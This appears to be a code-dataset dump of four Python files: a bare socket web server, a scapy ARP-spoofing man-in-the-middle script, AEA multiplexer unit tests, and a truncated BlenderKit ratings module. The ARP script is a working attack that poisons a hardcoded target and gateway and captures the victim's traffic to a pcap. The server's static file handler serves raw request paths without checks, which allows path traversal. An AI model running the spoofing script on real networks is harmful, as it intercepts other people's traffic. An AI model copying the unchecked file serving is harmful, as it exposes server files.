source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
server.py
|
import socket, threading, os
from urlparse import urlparse, parse_qs
import handler
HOST = '' # Symbolic name meaning all available interfaces
PORT = 8080 # Arbitrary non-privileged port
STATIC_PATH = "./"
urlMapper = dict()
def getType(path):
if path.endswith('.js'):
return 'application/javascript'
elif path.endswith('.html'):
return 'text/html'
elif path.endswith('.css'):
return 'text/css'
elif path.endswith('.jpeg'):
return 'image/jpeg'
elif path.endswith('.jpg'):
return 'image/jpeg'
elif path.endswith('.png'):
return 'image/png'
elif path.endswith('.gif'):
return 'image/gif'
elif path.endswith('.ttf'):
return 'application/x-font-ttf'
elif path.endswith('.woff'):
return 'application/font-woff'
elif path.endswith('.woff2'):
return 'application/font-woff2'
else:
return 'text/html'
def response(conn, status, content, res_type):
if status == 200 :
res = 'HTTP/1.0 200 OK\r\nContent-Type: ' + res_type + ';' +'\r\n\r\n' + content
else:
res = 'HTTP/1.0 404 Not Found\r\nContent-Type: text/html;\r\n\r\n'
conn.sendall(res)
conn.close()
def staticRes(path):
res = os.path.join(os.getcwd(), path[1:])
exists = os.path.exists(res)
print res, exists
if exists:
option = "rb"
if getType(path).startswith("text"):
option = "r"
f = open(res, option)
content = f.read()
return (True, content)
return (False, None)
def router(conn, verb, path, query):
if path == "/":
path = "/index.html"
parsedObj = urlparse(path)
path = parsedObj.path
queryFromUrl = parsedObj.query
if verb == 'get' or verb == 'GET' and queryFromUrl!= '':
query = queryFromUrl
res_type = getType(path)
if path in urlMapper:
func = urlMapper[path]
qs = parse_qs(query)
content = func(verb, path, qs)
response(conn, 200, content, res_type)
else:
(exists, content) = staticRes(path)
if exists:
response(conn, 200, content, res_type)
else:
response(conn, 404, None, res_type)
def serve(conn):
data = conn.recv(4096)
split_data = data.split("\r\n")
print split_data
if len(split_data) < 1:
return;
#print split_data
reqLine = split_data[0].split()
verb = reqLine[0]
path = reqLine[1]
protocol = reqLine[2]
query = split_data[-1]
router(conn, verb, path, query)
def webServer():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
handler.register(urlMapper)
while True:
conn, addr = s.accept()
print 'Connected by', addr
t = threading.Thread(target = serve, args = (conn,))
t.start()
s.close()
webServer()
|
ARP_Spoof.py
|
#!/usr/bin/python
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth1"
target = "192.168.108.49"
gateway = "192.168.108.1"
packets = 1000
conf.iface = interface
conf.verb = 0
def restore(gateway, gwmac_addr, target, targetmac_addr):
print "\nRestoring normal ARP mappings."
send(ARP(op = 2, psrc = gateway, pdst = target, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gwmac_addr), count = 5)
send(ARP(op = 2, psrc = target, pdst = gateway, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = targetmac_addr), count = 5)
sys.exit(0)
def macgrab(ip_addr):
responses, unanswered = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = ip_addr), timeout = 2, retry = 10)
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway, gwmac_addr, target, targetmac_addr):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway
poison_target.pdst = target
poison_target.hwdst = targetmac_addr
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target
poison_gateway.pdst = gateway
poison_gateway.hwdst = gwmac_addr
print "\nMitM ARP attack started."
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore(gateway, gwmac_addr, target, targetmac_addr)
return
gwmac_addr = macgrab(gateway)
targetmac_addr = macgrab(target)
if gwmac_addr is None:
print "\nUnable to retrieve gateway MAC address. Are you connected?"
sys.exit(0)
else:
print "\nGateway IP address: %s\nGateway MAC address: %s\n" % (gateway, gwmac_addr)
if targetmac_addr is None:
print "\nUnable to retrieve target MAC address. Are you connected?"
sys.exit(0)
else:
print "\nTarget IP address: %s\nTarget MAC address: %s\n" % (target, targetmac_addr)
mitm_thread = threading.Thread(target = poison_target, args = (gateway, gwmac_addr, target, targetmac_addr))
mitm_thread.start()
try:
print "\nMitM sniffing started. Total packets to be sniffed: %d" % packets
bpf = "ip host %s" % target
cap_packets = sniff(count=packets, filter=bpf, iface=interface)
wrpcap('arpMITMresults.pcap', cap_packets)
restore(gateway, gwmac_addr, target, targetmac_addr)
except KeyboardInterrupt:
restore(gateway, gwmac_addr, target, targetmac_addr)
sys.exit(0)
|
test_multiplexer.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for the Multiplexer."""
import asyncio
import logging
import os
import shutil
import sys
import tempfile
import time
import unittest.mock
from pathlib import Path
from threading import Thread
from unittest import mock
from unittest.mock import MagicMock, call, patch
import pytest
from pexpect.exceptions import EOF # type: ignore
import aea
from aea.cli.core import cli
from aea.configurations.base import PublicId
from aea.configurations.constants import DEFAULT_LEDGER
from aea.connections.base import ConnectionStates
from aea.exceptions import AEAEnforceError
from aea.helpers.exception_policy import ExceptionPolicyEnum
from aea.identity.base import Identity
from aea.mail.base import AEAConnectionError, Envelope, EnvelopeContext
from aea.multiplexer import AsyncMultiplexer, InBox, Multiplexer, OutBox
from aea.test_tools.click_testing import CliRunner
from packages.fetchai.connections.local.connection import LocalNode
from packages.fetchai.connections.p2p_libp2p.connection import (
PUBLIC_ID as P2P_PUBLIC_ID,
)
from packages.fetchai.protocols.default.message import DefaultMessage
from .conftest import (
AUTHOR,
CLI_LOG_OPTION,
ROOT_DIR,
UNKNOWN_CONNECTION_PUBLIC_ID,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_dummy_connection,
_make_local_connection,
_make_stub_connection,
logger,
)
from tests.common.pexpect_popen import PexpectWrapper
from tests.common.utils import wait_for_condition
@pytest.mark.asyncio
async def test_receiving_loop_terminated():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
multiplexer.connection_status.set(ConnectionStates.disconnected)
await multiplexer._receiving_loop()
mock_logger_debug.assert_called_with("Receiving loop terminated.")
multiplexer.connection_status.set(ConnectionStates.connected)
multiplexer.disconnect()
def test_connect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
def test_disconnect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
multiplexer.disconnect()
def test_connect_twice_with_loop():
"""Test that connecting twice the multiplexer behaves correctly."""
running_loop = asyncio.new_event_loop()
thread_loop = Thread(target=running_loop.run_forever)
thread_loop.start()
try:
multiplexer = Multiplexer([_make_dummy_connection()], loop=running_loop)
with unittest.mock.patch.object(
multiplexer.logger, "debug"
) as mock_logger_debug:
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
mock_logger_debug.assert_called_with("Multiplexer already connected.")
multiplexer.disconnect()
running_loop.call_soon_threadsafe(running_loop.stop)
finally:
thread_loop.join()
@pytest.mark.asyncio
async def test_connect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
assert not multiplexer.connection_status.is_connected
await multiplexer._connect_one(connection.connection_id)
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
await multiplexer._connect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already established."
)
await multiplexer._disconnect_one(connection.connection_id)
@pytest.mark.asyncio
async def test_run_bad_conneect():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = AsyncMultiplexer([connection])
f = asyncio.Future()
f.set_result(None)
with unittest.mock.patch.object(multiplexer, "connect", return_value=f):
with pytest.raises(ValueError, match="Multiplexer is not connected properly."):
await multiplexer.run()
def test_multiplexer_connect_all_raises_error():
"""Test the case when the multiplexer raises an exception while connecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(multiplexer, "_connect_all", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
multiplexer.disconnect()
def test_multiplexer_connect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the connection of one connection."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
with unittest.mock.patch.object(connection_3, "connect", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_disconnect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
await multiplexer._disconnect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already disconnected."
)
def test_multiplexer_disconnect_all_raises_error():
"""Test the case when the multiplexer raises an exception while disconnecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
assert multiplexer.connection_status.is_connected
with unittest.mock.patch.object(
multiplexer, "_disconnect_all", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
# # do the true disconnection - for clean the test up
assert multiplexer.connection_status.is_disconnecting
multiplexer.disconnect()
assert multiplexer.connection_status.is_disconnected
@pytest.mark.asyncio
async def test_multiplexer_disconnect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the disconnection of one connection."""
with LocalNode() as node:
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.connect()
assert connection_1.is_connected
assert connection_2.is_connected
assert connection_3.is_connected
with unittest.mock.patch.object(
connection_3, "disconnect", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert connection_3.is_connected
# clean the test up.
await connection_3.disconnect()
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_sending_loop_does_not_start_if_multiplexer_not_connected():
"""Test that the sending loop is stopped does not start if the multiplexer is not connected."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
await multiplexer._send_loop()
mock_logger_debug.assert_called_with(
"Sending loop not started. The multiplexer is not connected."
)
@pytest.mark.asyncio
async def test_sending_loop_cancelled():
"""Test the case when the sending loop is cancelled."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
await asyncio.sleep(0.1)
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
multiplexer.disconnect()
mock_logger_debug.assert_any_call("Sending loop cancelled.")
@pytest.mark.asyncio
async def test_receiving_loop_raises_exception():
"""Test the case when an error occurs when a receive is started."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with unittest.mock.patch("asyncio.wait", side_effect=Exception("a weird error.")):
with unittest.mock.patch.object(
multiplexer.logger, "error"
) as mock_logger_error:
multiplexer.connect()
time.sleep(0.1)
mock_logger_error.assert_called_with(
"Error in the receiving loop: a weird error.", exc_info=True
)
multiplexer.disconnect()
@pytest.mark.asyncio
async def test_send_envelope_with_non_registered_connection():
"""Test that sending an envelope with an unregistered connection raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=UNKNOWN_CONNECTION_PUBLIC_ID),
)
with pytest.raises(AEAConnectionError, match="No connection registered with id:.*"):
await multiplexer._send(envelope)
multiplexer.disconnect()
def test_send_envelope_error_is_logged_by_send_loop():
"""Test that the AEAConnectionError in the '_send' method is logged by the '_send_loop'."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
fake_connection_id = UNKNOWN_CONNECTION_PUBLIC_ID
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=fake_connection_id),
)
with unittest.mock.patch.object(multiplexer.logger, "error") as mock_logger_error:
multiplexer.put(envelope)
time.sleep(0.1)
mock_logger_error.assert_called_with(
"No connection registered with id: {}.".format(fake_connection_id)
)
multiplexer.disconnect()
def test_get_from_multiplexer_when_empty():
"""Test that getting an envelope from the multiplexer when the input queue is empty raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with pytest.raises(aea.mail.base.Empty):
multiplexer.get()
def test_send_message_no_supported_protocol():
"""Test the case when we send an envelope with a specific connection that does not support the protocol."""
with LocalNode() as node:
identity_1 = Identity("", address="address_1")
public_id = PublicId.from_str("fetchai/my_private_protocol:0.1.0")
connection_1 = _make_local_connection(
identity_1.address,
node,
restricted_to_protocols={public_id},
excluded_protocols={public_id},
)
multiplexer = Multiplexer([connection_1])
multiplexer.connect()
with mock.patch.object(multiplexer.logger, "warning") as mock_logger_warning:
protocol_id = UNKNOWN_PROTOCOL_PUBLIC_ID
envelope = Envelope(
to=identity_1.address,
sender=identity_1.address,
protocol_id=protocol_id,
message=b"some bytes",
)
multiplexer.put(envelope)
time.sleep(0.5)
mock_logger_warning.assert_called_with(
"Connection {} cannot handle protocol {}. Cannot send the envelope.".format(
connection_1.connection_id, protocol_id
)
)
multiplexer.disconnect()
def test_autoset_default_connection():
"""Set default connection automatically."""
connection_1 = _make_dummy_connection()
connection_2 = _make_dummy_connection()
connections = [connection_1, connection_2]
multiplexer = Multiplexer(connections)
multiplexer._default_connection = None
multiplexer._set_default_connection_if_none()
assert multiplexer._default_connection == connections[0]
@pytest.mark.asyncio
async def test_disconnect_when_not_connected():
"""Test disconnect when not connected."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections)
with patch.object(multiplexer, "_disconnect_all") as disconnect_all_mocked:
await multiplexer.disconnect()
disconnect_all_mocked.assert_not_called()
@pytest.mark.asyncio
async def test_exit_on_none_envelope():
"""Test sending task exit on None envelope."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
try:
await multiplexer.connect()
assert multiplexer.is_connected
multiplexer.put(None)
await asyncio.sleep(0.5)
assert multiplexer._send_loop_task.done()
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_inbox_outbox():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
msg.to = "to"
msg.sender = "sender"
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=msg,
context=context,
)
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = OutBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
outbox.put(envelope)
received = await inbox.async_get()
assert received == envelope
assert inbox.empty()
assert outbox.empty()
outbox.put_message(msg, context=context)
await inbox.async_wait()
received = inbox.get_nowait()
assert received == envelope
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_threaded_mode():
"""Test InBox OutBox objects in threaded mode."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, threaded=True)
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
msg.to = "to"
msg.sender = "sender"
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=msg,
context=context,
)
try:
multiplexer.start()
await asyncio.sleep(0.5)
inbox = InBox(multiplexer)
outbox = OutBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
outbox.put(envelope)
received = await inbox.async_get()
assert received == envelope
assert inbox.empty()
assert outbox.empty()
outbox.put_message(msg, context=context)
await inbox.async_wait()
received = inbox.get_nowait()
assert received == envelope
finally:
multiplexer.stop()
@pytest.mark.asyncio
async def test_outbox_negative():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=b"",
context=context,
)
try:
await multiplexer.connect()
outbox = OutBox(multiplexer)
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put(envelope)
assert (
str(execinfo.value)
== "Only Message type allowed in envelope message field when putting into outbox."
)
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message("")
assert str(execinfo.value) == "Provided message not of type Message."
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert str(execinfo.value) == "Provided message has message.to not set."
assert outbox.empty()
msg.to = "to"
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert str(execinfo.value) == "Provided message has message.sender not set."
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_default_route_applied(caplog):
"""Test default route is selected automatically."""
logger = logging.getLogger("aea.multiplexer")
with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"):
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
multiplexer.logger = logger
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(),
)
multiplexer.default_routing = {
DefaultMessage.protocol_id: connection_1.connection_id
}
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = InBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
multiplexer.put(envelope)
await outbox.async_get()
finally:
await multiplexer.disconnect()
assert "Using default routing:" in caplog.text
def test_multiplexer_setup():
"""Test multiplexer setup to set connections."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
connections = [connection_1, connection_2, connection_3]
multiplexer = Multiplexer([])
with pytest.raises(AEAEnforceError):
multiplexer._connection_consistency_checks()
multiplexer.setup(connections, default_routing=None)
multiplexer._connection_consistency_checks()
class TestExceptionHandlingOnConnectionSend:
"""Test exception handling policy on connection.send."""
def setup(self):
"""Set up test case."""
self.connection = _make_dummy_connection()
self.multiplexer = Multiplexer([self.connection])
self.multiplexer.connect()
self.envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=self.connection.connection_id),
)
self.exception = ValueError("expected")
def teardown(self):
"""Tear down test case."""
self.multiplexer.disconnect()
def test_log_policy(self):
"""Test just log exception."""
with patch.object(self.connection, "send", side_effect=self.exception):
self.multiplexer._exception_policy = ExceptionPolicyEnum.just_log
self.multiplexer.put(self.envelope)
time.sleep(1)
assert not self.multiplexer._send_loop_task.done()
def test_propagate_policy(self):
"""Test propagate exception."""
assert self.multiplexer._exception_policy == ExceptionPolicyEnum.propagate
with patch.object(self.connection, "send", side_effect=self.exception):
self.multiplexer.put(self.envelope)
time.sleep(1)
wait_for_condition(
lambda: self.multiplexer._send_loop_task.done(), timeout=5
)
assert self.multiplexer._send_loop_task.exception() == self.exception
def test_stop_policy(self):
"""Test stop multiplexer on exception."""
with patch.object(self.connection, "send", side_effect=self.exception):
self.multiplexer._exception_policy = ExceptionPolicyEnum.stop_and_exit
self.multiplexer.put(self.envelope)
time.sleep(1)
wait_for_condition(
lambda: self.multiplexer.connection_status.is_disconnected, timeout=5
)
def test_disconnect_order(self):
"""Test disconnect order: tasks first, disconnect_all next."""
parent = MagicMock()
async def fn():
return
with patch.object(
self.multiplexer, "_stop_receive_send_loops", return_value=fn()
) as stop_loops, patch.object(
self.multiplexer, "_disconnect_all", return_value=fn()
) as disconnect_all, patch.object(
self.multiplexer, "_check_and_set_disconnected_state"
) as check_and_set_disconnected_state:
parent.attach_mock(stop_loops, "stop_loops")
parent.attach_mock(disconnect_all, "disconnect_all")
parent.attach_mock(
check_and_set_disconnected_state, "check_and_set_disconnected_state"
)
self.multiplexer.disconnect()
assert parent.mock_calls == [
call.stop_loops(),
call.disconnect_all(),
call.check_and_set_disconnected_state(),
]
class TestMultiplexerDisconnectsOnTermination: # pylint: disable=attribute-defined-outside-init
"""Test multiplexer disconnects on agent process keyboard interrupted."""
def setup(self):
"""Set the test up."""
self.proc = None
self.runner = CliRunner()
self.agent_name = "myagent"
self.cwd = os.getcwd()
self.t = tempfile.mkdtemp()
shutil.copytree(Path(ROOT_DIR, "packages"), Path(self.t, "packages"))
os.chdir(self.t)
self.key_path = os.path.join(self.t, "fetchai_private_key.txt")
self.conn_key_path = os.path.join(self.t, "conn_private_key.txt")
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "init", "--local", "--author", AUTHOR]
)
assert result.exit_code == 0
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "create", "--local", self.agent_name]
)
assert result.exit_code == 0
os.chdir(Path(self.t, self.agent_name))
def test_multiplexer_disconnected_on_early_interruption(self):
"""Test multiplexer disconnected properly on termination before connected."""
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "add", "--local", "connection", str(P2P_PUBLIC_ID)]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "build"])
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.key_path]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "add-key", DEFAULT_LEDGER, self.key_path]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.conn_key_path]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli,
[
*CLI_LOG_OPTION,
"add-key",
DEFAULT_LEDGER,
self.conn_key_path,
"--connection",
],
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "issue-certificates"])
assert result.exit_code == 0, result.stdout_bytes
self.proc = PexpectWrapper( # nosec
[sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"],
env=os.environ,
maxread=10000,
encoding="utf-8",
logfile=sys.stdout,
)
self.proc.expect_all(
["Starting libp2p node..."], timeout=50,
)
self.proc.control_c()
self.proc.expect_all(
["Multiplexer .*disconnected."], timeout=20, strict=False,
)
self.proc.expect_all(
[EOF], timeout=20,
)
def test_multiplexer_disconnected_on_termination_after_connected(self):
"""Test multiplexer disconnected properly on termination after connected."""
self.proc = PexpectWrapper( # nosec
[sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"],
env=os.environ,
maxread=10000,
encoding="utf-8",
logfile=sys.stdout,
)
self.proc.expect_all(
["Start processing messages..."], timeout=20,
)
self.proc.control_c()
self.proc.expect_all(
["Multiplexer disconnecting...", "Multiplexer disconnected.", EOF],
timeout=20,
)
def teardown(self):
"""Tear the test down."""
if self.proc:
self.proc.wait_to_complete(10)
os.chdir(self.cwd)
try:
shutil.rmtree(self.t)
except (OSError, IOError):
pass
def test_multiplexer_setup_replaces_connections():
"""Test proper connections reset on setup call."""
m = AsyncMultiplexer([MagicMock(), MagicMock(), MagicMock()])
assert len(m._id_to_connection) == 3
assert len(m._connections) == 3
m.setup([MagicMock()], MagicMock())
assert len(m._id_to_connection) == 1
assert len(m._connections) == 1
|
ratings.py
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
from importlib import reload
paths = reload(paths)
utils = reload(utils)
rerequests = reload(rerequests)
tasks_queue = reload(tasks_queue)
else:
from blenderkit import paths, utils, rerequests, tasks_queue
import bpy
import requests, threading
from bpy.props import (
IntProperty,
FloatProperty,
StringProperty,
EnumProperty,
BoolProperty,
PointerProperty,
)
from bpy.types import (
Operator,
Panel,
)
def pretty_print_POST(req):
"""
pretty print a request
"""
print('{}\n{}\n{}\n\n{}'.format(
'-----------START-----------',
req.method + ' ' + req.url,
'\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),
req.body,
))
def upload_rating_thread(url, ratings, headers):
''' Upload rating thread function / disconnected from blender data.'''
utils.p('upload rating', url, ratings)
for rating_name, score in ratings:
if (score != -1 and score != 0):
rating_url = url + rating_name + '/'
data = {
"score": score, # todo this kind of mixing is too much. Should have 2 bkit structures, upload, use
}
try:
r = rerequests.put(rating_url, data=data, verify=True, headers=headers)
except requests.exceptions.RequestException as e:
print('ratings upload failed: %s' % str(e))
def send_rating_to_thread_quality(url, ratings, headers):
'''Sens rating into thread rating, main purpose is for tasks_queue.
One function per property to avoid lost data due to stashing.'''
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
def send_rating_to_thread_work_hours(url, ratings, headers):
'''Sens rating into thread rating, main purpose is for tasks_queue.
One function per property to avoid lost data due to stashing.'''
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
def upload_review_thread(url, reviews, headers):
r = rerequests.put(url, data=reviews, verify=True, headers=headers)
# except requests.exceptions.RequestException as e:
# print('reviews upload failed: %s' % str(e))
def get_rating(asset_id):
# this function isn't used anywhere,should probably get removed.
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
rl = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
rtypes = ['quality', 'working_hours']
for rt in rtypes:
params = {
'rating_type': rt
}
r = rerequests.get(r1, params=data, verify=True, headers=headers)
print(r.text)
def update_ratings_quality(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
asset = self.id_data
if asset:
bkit_ratings = asset.bkit_ratings
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
else:
# this part is for operator rating:
bkit_ratings = self
url = paths.get_api_url() + f'assets/{self.asset_id}/rating/'
if bkit_ratings.rating_quality > 0.1:
ratings = [('quality', bkit_ratings.rating_quality)]
tasks_queue.add_task((send_rating_to_thread_quality, (url, ratings, headers)), wait=2.5, only_last=True)
def update_ratings_work_hours(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
asset = self.id_data
if asset:
bkit_ratings = asset.bkit_ratings
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
else:
# this part is for operator rating:
bkit_ratings = self
url = paths.get_api_url() + f'assets/{self.asset_id}/rating/'
if bkit_ratings.rating_work_hours > 0.05:
ratings = [('working_hours', round(bkit_ratings.rating_work_hours, 1))]
